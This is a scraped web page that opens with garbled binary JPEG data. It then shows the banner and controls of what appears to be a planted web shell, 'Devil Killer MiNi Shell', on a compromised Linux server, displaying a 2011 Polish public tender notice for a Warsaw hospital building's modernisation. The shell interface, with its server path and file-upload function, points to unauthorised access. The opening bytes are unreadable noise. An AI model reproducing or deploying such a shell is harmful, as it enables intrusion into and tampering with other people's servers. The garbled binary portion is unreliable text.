JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110419/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110419/118347-N-2011.html

<p class="kh_header"><b>Warszawa: modernizacja budynku F - realizacja w 2011 r</b><br>
<b>Numer ogłoszenia: 118347 - 2011; data zamieszczenia: 19.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Międzyleski Szpital Specjalistyczny w Warszawie , ul. Bursztynowa 2, 04-749 Warszawa, woj. mazowieckie, tel. 022 4735145, faks 022 6131992.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mssw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> modernizacja budynku F - realizacja w 2011 r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lokalizacja  przedmiotu zamówienia: 
Międzyleski Szpital Specjalistyczny w Warszawie 
ul. Bursztynowa 2, 04-749 Warszawa - Międzylesie,
dz. nr ewid. 59, obręb  ewid. 262  oraz 
dz. nr ewid. 48/8; 48/12; 48/13; 48/14; obręb ewid.  3-11-47,
w jednostce ewidencyjnej 146514_8 Warszawa -Wawer.
Zakres ogólny przedmiotu zamówienia :
Przedmiot zamówienia obejmuje:
1. Opracowanie uzupełniającej dokumentacji projektowej.
2. Przygotowanie terenu inwestycji.
3. Wykonanie robót budowlano montażowych.
4. Sporządzenie dokumentacji budowy i dokumentacji powykonawczej.
I. Opracowanie uzupełniającej dokumentacji projektowej 
1..Przedmiot zamówienia obejmuje opracowanie w oparciu o zatwierdzone projekty budowlane oraz zgodnie z  programem funkcjonalno-użytkowy dostarczonym przez Zamawiającego następujących projektów wykonawczych z kosztorysami inwestorskimi, niezbędnych do zrealizowania robót budowlano - montażowych wchodzących w skład przedmiotu zamówienia:
 	1.1.Projekt aranżacji i pierwszego wyposażenia wnętrz wybranych pomieszczeń w budynku F w tym aranżacja elewacji oraz aranżacji terenu otoczenia budynku F.
    1.2 Opracowanie projektu wykonawczego z kosztorysem inwestorskim sieci informatycznej w budynku F.
1.3   Opracowanie projektu wykonawczego z kosztorysem inwestorskim instalacji sygnalizacji włamania i kontroli dostępu.
1.4  Opracowanie projektu wykonawczego z kosztorysem inwestorskim urządzenia parkingu podziemnego (organizacji ruchu i oznakowania) oraz organizacji ruchu na drogach dojazdowych.
2. Zamawiający informuje, że w odniesieniu do pomieszczeń holu głównego z klatka wachlarzową oraz do wind preferuje standard wysoki, w odniesieniu do pozostałych pomieszczeń standard średni, w zakresie rozwiązań technologicznych i kosztów. 
3. Do opracowania projektów wykonawczych Zamawiający przekaże Wykonawcy następujące materiały wyjściowe:
3.1. Wypis i wyrys z Miejscowego Planu Zagospodarowania Przestrzennego.
3.2. Projekty  budowlano- wykonawcze budynku F.
3.3. Zamienny projekt budowlany przebudowy i nadbudowy budynku F.
3.4. Projekt budowlany szybu windowego przy bloku D. 
3.5. Projekty  budowlano-wykonawczy drogi dojazdowej 
3.6. Aktualną mapę do celów projektowych w skali 1:500.
3.7. Program funkcjonalno -użytkowy aranżacji i pierwszego wyposażenia wnętrz wybranych pomieszczeń  w budynku F oraz aranżacji elewacji i aranżacji otoczenia budynku.
4. Dokumentacje projektowo-kosztorysowe należy opracować w wersji papierowej:
- projekty wykonawcze z zestawieniem materiałów i wyposażenia w 4 egz.,
- kosztorysy inwestorskie  w 1 egz.,
- wizualizację holu głównego w 3 egz.,
    oraz komplet w wersji elektronicznej w 1 egz.

II. Przygotowanie terenu inwestycji
Przed przystąpieniem do wykonywania robót budowlanych Wykonawca w ramach przygotowania terenu inwestycji winien wykonać:
1. Rozbiórkę fragmentu istniejącego ogrodzenia  o długości ca 20 mb.  oraz dwie  bram z furtkami ,
2. Wycinkę trzech drzew kolidujących z projektowaną drogą dojazdową od ul. Bursztynowej do izby przyjęć, garażu podziemnego i do przychodni wraz z poniesieniem opłat na Fundusz Ochrony Środowiska za ich  usunięcie   lub dokonania nasadzeń zamiennych zgodnie z decyzją Wydziału Ochrony Środowiska dla Dzielnicy Wawer.
3. Zabezpieczenie na czas budowy drzew przeznaczonych do zagospodarowania przez owinięcie matami i odeskowanie pni.
4. Makroniwelację terenu pod budowę drogi dojazdowej.
5. Zagospodarowanie placu budowy (podłączenie  mediów dla potrzeb budowy, zaplecze socjalne i magazynowe, ogrodzenie). 
6. Projekt tymczasowej  organizacji i oznakowania ruchu na  czas realizacji wjazdu na  teren  Szpitala z ul. Bursztynowej wraz z uzyskaniem zgody na  zajęcie pasa drogowego i z  poniesieniem opłat z tym zajęciem związanych.
III. Wykonanie robót budowlanych
Przedmiot zamówienia pn. Modernizacja budynku F realizacja w 2011 roku - obejmuje:
1. wykonanie robót wykończeniowych budowlanych i branżowych w budynku F, będącym w stanie surowym zamkniętym wraz z dostawą i montażem dźwigu osobowego
2. budowa zewnętrznego szybu windowego wraz z dostawą i montażem dwóch dźwigów osobowych 
3. wykonanie robót drogowych obejmujących ulicę dojazdową, podjazdy do izby przyjęć, przychodni i zjazd do parkingu podziemnego 
4. wykonanie robót wykończeniowych pierwszego wyposażenia wnętrz wybranych pomieszczeń w budynku  - F oraz aranżacji elewacji i terenu otoczenia budynku- F. 

Zakres zadania obejmujący wykonanie robót w niżej wymienionym zakresie jest opisany przedmiarami robót:  
1.    wykonanie robót budowlanych poza holem głównym:
1.1. tynk i roboty malarskie;
1.2. roboty posadzkarskie;
1.3. elewacja;
1.4. roboty wykończeniowe pomieszczeń;
1.5. konstrukcja zewnętrznego szybu windowego;
1.6 dostawa i montaż 3 dźwigów osobowych;
2.  roboty drogowe (ulica dojazdowa, podjazdy do izby przyjęć, przychodni i zjazd do parkingu podziemnego):
2.1.roboty ziemne;
2.2.podbudowa;
2.3.wykonanie nawierzchni ulicy i podjazdów z nawiązaniem do istniejących dróg;
2.4 odwodnienie dróg.
3. roboty sanitarne:
3.1 instalacja wod-kan - biały montaż;
3.2 instalacja ciepła technologicznego i centralnego ogrzewania;
3.3 instalacja gazów medycznych - osprzęt;
3.4 przyłącza kanalizacji;
3.5 instalacja wentylacji - osprzęt, urządzenia i automatyka;
4. roboty elektryczne:
4.1 instalacja elektryczna silno i słaboprądowa wraz z osprzętem;
oświetlenie terenu.
Zakres zadania niżej wymienionych robót będzie wykonywany zgodnie z projektem    
wykonawczym opracowanym przez Wykonawcę i zatwierdzonym przez Zamawiającego do 
realizacji:
5. wykonanie aranżacji i pierwszego wyposażenia wnętrz wybranych pomieszczeń w budynku F  oraz aranżacji elewacji i terenu otoczenia budynku F.

Roboty budowlane wykonać należy zgodnie n/w projektami, które Zamawiający przekaże Wykonawcy:
1. PBW - architektura nr arch. 95 885.
2.PBW - konstrukcja  nr arch. 95 937.
3.PBW - inst. wod. -kan. nr arch. 93476.
4. PBW - ciepło technologiczne   nr arch. 93 478.
5. PBW - gazów medycznych  nr arch. 95 963.
6. PBW - przyłącza kanalizacji ks i kd  nr arch. 93 477.
7. PBW - wentylacji mechanicznej nr arch. 93 474.
8. PBW - instalacji elektryczne-słaboprądowe  nr arch. 93 467.
9. PBW - instalacji elektryczne-silnoprądowe  nr arch. 93 466.
10. PBW - drogi i parkingi nr arch. 95 920.
11.  PBW - odwodnienie dróg i parkingów nr arch. 95 958.
12.  PBW - oświetlenie terenu  nr arch. 95 932.
W ramach robót uzupełniających określonych w projektach należy dodatkowo wykonać: 
1) wymianę istniejącego zniszczonego odcinka drogi na nowy, łączącego projektowany wjazd na teren szpitala z projektowanym podjazdem do izby przyjęć.
2) w miejscu  rozebranego fragmentu ogrodzenia  wykonać nowe wraz z  jego rozbudową do długości  ok. 35 mb 
3) urządzenie terenu wokół budynku F na powierzchni ca 500 m2 (niwelacja i plantowanie terenu, obsianie mieszanką traw na warstwie humusu)    
Ponadto podstawę do zrealizowania całego przedmiotu zamówienia, jako uzupełnienie projektów przekazanych przez Zamawiającego, stanowić będą projekty wykonawcze opracowane przez Wykonawcę po ich zatwierdzeniu do realizacji, wymienione w pkt. I.1.opisu przedmiotu zamówienia 
1. Roboty będą wykonywane na podstawie:
   1.1 Prawomocnych pozwoleń na budowę uzyskanych przez Zamawiającego. 
   1.2 Szczegółowego zakresu robót określonego w projektach wykonawczych oraz przedmiarach robót stanowiących ich integralną część.
   1.3 Zakres robót ujęty jest w tabeli wartości elementów scalonych, załączony do SIWZ -  załącznik nr 3.
2. Roboty należy wykonywać zgodnie z przepisami zawartymi w:
    2.1. Ustawie z dnia 7 lipca 1994 r.  Prawo budowlane (Dz. U. 10.243.1623 z późn. zm.)
    2.2. Rozporządzeniu Ministra Zdrowia z dnia z dnia 02.02.2011 r. w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. z 2011 r. nr 31 poz. 158).
   2.3. Rozporządzeniu Ministra  Infrastruktury  z dnia 12 kwietnia 2002 r. w sprawie warunków  technicznych, jakim powinny odpowiadać budynki i ich usytuowanie z późniejszymi zmianami.
   2.4. Ustawie Prawo ochrony środowiska i  Ustawie o odpadach   z dnia 27 kwietnia 2001 r. z  późniejszymi zmianami. 
   2.5. Obowiązujących obecnie szczegółowych przepisach prawnych, rozwiązaniach prawno-technicznych, w  Polskich Normach oraz wytycznych   w zakresie projektowania i wykonawstwa budowlanego.
3. Wymagania w zakresie wykonywanych robót.
1) Roboty należy wykonywać zgodnie z dokumentacją projektową,  z należytą starannością oraz zgodnie ze sztuką budowlaną w zakresie niezbędnym do uzyskania pozwolenia na użytkowanie. 
2) Wykonawca wykonuje roboty w miejscach  wskazanych przez Zamawiającego.
3) Wszelkie szczegółowe roboty budowlane, instalacyjne i montażowe oraz  demontażowe Wykonawca wykonuje wg dokumentacji projektowej i zgodnie ze wszelkimi wskazówkami zawartymi w niniejszym SIWZ.
4) Wszystkie sprawy techniczne i administracyjne związane z robotami leżą po stronie  Wykonawcy.
5) Rozwiązania budowlane i zastosowanie wyrobów, materiałów i urządzeń Wykonawca uzgadnia z Zamawiającym.
6) Wykonawca zabezpieczy teren robót zgodnie z obowiązującymi aktualnie  przepisami BHP, p.poż  i innymi przepisami w zakresie prawa budowlanego.
7) Wykonawca w trakcie realizacji przebudowy zobowiązany jest do utrzymywania ładu i porządku na budowie oraz w jej otoczeniu , a w szczególności do należytego zbierania, składowania, transportu i zagospodarowania lub  utylizacji wszelkich zbędnych materiałów i  urządzeń, odpadów oraz śmieci jakie pozostają po prowadzonych pracach budowlanych.
8) Wszystkie zadania i  prace Wykonawca wykona zgodnie z obowiązującymi w tym zakresie    przepisami - Prawa Polskiego i Prawa Unii Europejskiego.           
Wszystkie roboty budowlane, instalacyjne i montażowe, oraz inne  prace należy wykonać  zgodnie z niniejszą  Specyfikacją Techniczną i dokumentacją projektową.

4. Terminy wykonania zadania.
Zleceniodawca przewiduje wykonanie przedmiotu zamówienia  w okresie do dnia 15.11.2011 r.

III. Sporządzenie dokumentacji powykonawczej budowy
Przedmiot zamówienia obejmuje sporządzenie, do dnia odbioru końcowego robót, dokumentacji budowy, składającej się z dziennika budowy oraz z przygotowanych do przekazania Zamawiającemu w oddzielnie spiętym zbiorze dokumentów, takich jak: 
1)kompletna dokumentacja powykonawcza, 
2) protokoły  techniczne  odbioru robót  branżowych,
3) atesty, certyfikaty i ew. aprobaty techniczne na wbudowane materiały, armaturę i 
     urządzenia ,
4) wymagane przepisami szczegółowymi protokoły i zaświadczenia z przeprowadzonych  przez wykonawcę badań, sprawdzeń  oraz prób,
5) powykonawcza inwentaryzacja geodezyjna,
6) instrukcje obsługi, karty gwarancyjne, DTR dla wbudowanych wyrobów i urządzeń,
7) oświadczenie kierownika budowy o zgodności wykonania robót z zatwierdzonym projektem budowlanym, warunkami pozwolenia na budowę, aktualnie  obowiązującymi przepisami oraz polskimi normami (w przypadku zmian oświadczenia kierownika budowy powinno być poświadczenie przez inspektora-ów nadzoru).
8)  oświadczenie kierownika budowy o doprowadzeniu do należytego stanu i porządku terenu budowy, 
9)  ze względu na zmiany nie odstępujące w sposób istotny od  zatwierdzonego projektu budowlanego i warunków pozwolenia na budowę, wykonawca dołączy kopie rysunków wchodzących w skład zatwierdzonego projektu budowlanego z naniesionymi zmianami i  uzupełniającym opisem technicznym,    
10) pisemna gwarancja jakości na wykonany przedmiot umowy.

Wyżej wymieniony zbiór dokumentów winien być opatrzony szczegółowym wykazem  
wraz z oświadczeniem, że dostarczona dokumentacja zawiera komplet dokumentów  
 niezbędnych do uzyskania pozwolenia na użytkowanie obiektów.  
  
Warunkiem zakończenia inwestycji jest uzyskanie przez Inwestora pozwolenia na użytkowanie.

IV. dostawa i montaż wyposażenia holu głównego - zgodnie z wykonaną i przyjętą przez Zamawiającego dokumentacją.

V.  Zaleca się, aby Wykonawca przed przygotowaniem oferty, zapoznał się z miejscem robót budowlanych tj.: poprzez dokonanie wizji lokalnej, zadaniem wszelkich pytań związanych z realizacją zamówienia. Dokumentacja projektowa jest do wglądu w siedzibie Zamawiającego (dział Techniczny), za uprzednim powiadomieniem. 

VI. Projekt umowy stanowiący Załącznik Nr 1 do siwz jest integralną część niniejszej dokumentacji i zapisy w niej zawarte traktuje się jako warunki udzielenia zamówienia.
VII. Zamawiający dopuszcza podwykonawców branżowych z zastrzeżeniem wykonania robót budowlanych, które muszą być wykonane  przez Wykonawcę. W takim przypadku Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 225.000,00 zł  słownie zł: dwieście dwadzieścia pięć tysięcy złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku posiadania wiedzy i doświadczenia Wykonawca wykaże minimum - 3 robotami budowlanymi odpowiadającymi opisowi  przedmiotu zamówienia o wartości nie mniejszej niż 2.000.000,00 zł każda.
Zamawiający będzie je oceniał:
- minimum 3 roboty budowlane odpowiadające przedstawionego przez Zamawiającego przedmiotu zamówienia o wartości nie mniejszej niż 2.000.000,00 zł każda - spełnia 
- mniej niż 3 roboty budowlane odpowiadające przedstawionego przez Zamawiającego przedmiotu zamówienia o wartości nie mniejszej niż 2.000.000,00 zł każda  - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b) W celu wykazania spełnienia warunku znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
- wykonawca winien wykazać się wysokością posiadanych środków lub zdolnością kredytową w wysokości co najmniej 1.000.000,00 zł 
- posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokość sumy gwarancyjnej nie mniejszej niż 2.000.000,00 zł, a okres ubezpieczenia obejmować musi czas realizowania zamówienia przez Wykonawcę.
Zamawiający będzie je oceniał:
- posiada środki finansowe lub zdolność kredytową w wysokości minimum 1.000.000,00 zł - spełnia
- posiada środki finansowe lub zdolność kredytową w wysokości mniejszej niż 1.000.000,00 zł - nie spełnia
-  za spełnienie warunku ubezpieczenia od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej, Zamawiający uzna posiadanie przez Wykonawcę polisy, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dowód wniesienia/wpłacenia wadium.
2. Kosztorysy ofertowe.
3. Koncepcje:
- projekt koncepcyjny aranżacji wnętrz składającego się z rysunków;
-  rzutów kondygnacji - wraz z opisem poszczególnych pomieszczeń (nazwa pomieszczenia, powierzchnia) oraz zestawieniem powierzchni użytkowej w skali 1:20, opis materiałów kolorystyki wykończeń
- rysunków elementów wyposażenia w skali umożliwiającej ich odtwarzanie (od 1:1 do 1:10), opis materiałów i kolorystyki
- charakterystyczne przekroje pionowe min. 2 szt., w skali nie mniejszej niż 1:20
- aranżacji wnętrz - rysunki planu wnętrz w skali 1:20, rysunki wyposażenia w skali umożliwiającej ich odtworzenia (od 1:1 do 1:10), opis materiałów i kolorystyki;
- trójwymiarowa prezentacja koncepcji w postaci widoków aksometrycznych, rysunków perspektywicznych wizualizacji komputerowych ilustrujących przyjęte rozwiązania projektowe;
- opis koncepcji z podstawowymi informacjami na temat przyjętych rozwiązań funkcjonalnych, materiałowych i technicznych oraz spisem pomieszczeń zestawień pomieszczeń i wskaźników kosztowych, wyceny kosztorysowej projektowanego rozwiązania.</p>
